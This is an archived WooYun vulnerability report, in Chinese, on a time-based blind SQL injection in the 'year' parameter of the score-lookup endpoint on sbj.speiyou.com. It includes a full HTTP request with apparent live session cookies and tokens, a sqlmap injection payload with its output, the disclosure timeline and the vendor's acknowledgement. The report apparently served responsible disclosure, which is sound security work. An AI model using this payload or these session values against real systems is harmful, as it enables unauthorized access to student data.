乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-08: 细节已通知厂商并且等待厂商处理中 2015-07-09: 厂商已经确认,细节仅向厂商公开 2015-07-19: 细节向核心白帽子及相关领域专家公开 2015-07-29: 细节向普通白帽子公开 2015-08-08: 细节向实习白帽子公开 2015-08-23: 细节向公众公开
上个事件中曾报过另一个分站的问题,发现这个SQL注入都是发生在同一个位置,多个分站应该都会存在其问题。
注入点:POST /Students/getScore/ HTTP/1.1Host: sbj.speiyou.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://sbj.speiyou.com/Students/getScoreCookie: __utma=190819817.287472353.1436276128.1436281125.1436284214.3; __utmz=190819817.1436276128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_b0a8166882e17ab0eb76cbb036d7ffd8=1436276128,1436281125; __utmc=190819817; Hm_lpvt_b0a8166882e17ab0eb76cbb036d7ffd8=1436284223; CAKEPHP=ermfclsmpfekhojqku5457id90; lastact=http%3A%2F%2Fsbj.speiyou.com%2FStudents%2Findex; BIGipServerPY_Web-YouHua_Pool=1997318336.20480.0000; jfs=http%3A//sbj.speiyou.com/shouye/; Hm_lvt_bc32c5daddabcf51a91b42068054117d=1436284158; Hm_lpvt_bc32c5daddabcf51a91b42068054117d=1436284252; CakeCookie[XESCAS][Cas]=W%19%D8Xth%E6q%B3%A4%90E%1D%80%B5%07%7Beo%B8%C9%0Db%09%5DyD%A8%81%8A%B4%CA%ADM%C6%B1M%C2T%BAL%E5%E2%9B%7E%D4%C30%F6%3EA__%EE%C6%05H%FC%F9%A1%8Ae%19%BA%DA%9E%A3X%28%83R%E0%BB%EE2%C8%CEr%29%0FV%F9%B88%90%08%DB%C4%7C%12%FC%D2%00%93%24%BB%CD%40+y%D7%AC%22%D2%40%5E%1Ef%E3%C0%A0%5D%F7%83%13W%857%5DY%CDc%3A%C0%A8%85%1F%5D%C0%D2%84%FE%3F%60%D7%98%93%87%97s%0A%7Eqs; Hm_lvt_9d97af10d05de971ff7e7280467a8f58=1436284210; Hm_lpvt_9d97af10d05de971ff7e7280467a8f58=1436284221; XESCAS[tk]=ZUdWekxUVTBhMkkwT1hWc2JXbDBiR3R4TTJkdWFqYzFhVFJ4TlRFMQ; __utmb=190819817.2.10.1436284214; __utmt=1; stoken=ZUdWekxUVTBhMkkwT1hWc2JXbDBiR3R4TTJkdWFqYzFhVFJ4TlRFMQ; newstoken=ZUdWekxUVTBhMkkwT1hWc2JXbDBiR3R4TTJkdWFqYzFhVFJ4TlRFMQ; Hm_lvt_bbcf414eff5e373d6608c2842ef99468=1436284226; Hm_lpvt_bbcf414eff5e373d6608c2842ef99468=1436284226; looyu_id=32764eae226f9d768c4de300752d2ad9ca_31691%3A1; looyu_31691=v%3A32764eae226f9d768c4de300752d2ad9ca%2Cref%3A%2Cr%3A%2Cmon%3Ahttp%3A//m141.looyu.com/monitor; B_cookie_login_status=okConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 112year=2013&grade=1&subject=ff80808127d77caa0127d7e13be500c6&recommend=qmcs&paperName=11&button=%E6%9F%A5%E8%AF%A2
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: year (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: year=2013' AND (SELECT * FROM (SELECT(SLEEP(5)))Soym) AND 'sdDF'='sdDF&grade=1&subject=ff80808127d77caa0127d7e13be500c6&recommend=qmcs&paperName=11&button=%E6%9F%A5%E8%AF%A2---back-end DBMS: MySQL 5.0.12current database: 'py_rxcs'
过滤相关参数
危害等级:高
漏洞Rank:15
确认时间:2015-07-09 19:18
谢谢,修复中
暂无